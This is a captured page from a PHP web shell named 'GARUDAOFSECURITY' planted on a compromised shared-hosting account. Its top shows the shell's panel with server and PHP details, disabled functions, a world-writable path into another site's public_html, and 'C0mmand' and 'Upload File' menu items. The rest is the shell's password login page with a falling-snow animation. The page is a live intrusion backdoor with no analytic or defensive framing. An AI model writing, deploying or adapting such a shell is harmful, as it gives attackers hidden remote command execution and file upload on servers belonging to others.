|
Server IP : 2a02:4780:3:2287:0:3736:a38e:8 / Your IP : 216.73.216.24 Web Server : LiteSpeed System : Linux sg-nme-web2187.main-hosting.eu 5.14.0-611.54.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed May 6 18:03:03 EDT 2026 x86_64 User : u926327694 ( 926327694) PHP Version : 7.4.33 Disable Function : system, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0777) : /home/u926327694/domains/svschool.in/../jsssakrilawcollegehubli.in/public_html/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!DOCTYPE html>
<html>
<head>
<title>WEBSHELL GARUDAOFSECURITY</title>
<style>
body {
margin: 0;
padding: 0;
height: 100vh;
width: 100vw;
background: #000;
overflow: hidden;
position: relative;
}
.login-container {
position: absolute;
top: 50%;
left: 50%;
transform: translate(-50%, -50%);
width: 300px;
background: #fff;
padding: 20px;
border: 1px solid #ccc;
box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
text-align: center;
z-index: 1;
}
.login-container input {
width: calc(100% - 22px);
padding: 10px;
margin: 10px 0;
box-sizing: border-box;
}
.login-container label {
display: block;
margin-bottom: 10px;
}
.snowflake {
position: absolute;
background: white;
border-radius: 50%;
width: 5px;
height: 5px;
opacity: 0.8;
pointer-events: none;
z-index: 0;
animation: fall linear;
}
@keyframes fall {
to {
transform: translateY(100vh);
}
}
</style>
</head>
<body>
<div class="login-container">
<form method="POST" action="">
<label for="password">LOGIN DISINI GARUDAOFSECURITY</label>
<input type="password" id="password" name="password" autofocus>
<input type="submit" value="LOGIN">
</form>
</div>
<script>
function createSnowflake() {
const snowflake = document.createElement('div');
snowflake.className = 'snowflake';
snowflake.style.left = Math.random() * 100 + 'vw';
snowflake.style.animationDuration = Math.random() * 3 + 2 + 's';
snowflake.style.opacity = Math.random();
document.body.appendChild(snowflake);
setTimeout(() => {
snowflake.remove();
}, 5000);
}
setInterval(createSnowflake, 100);
</script>
</body>
</html>
<?php
}
?>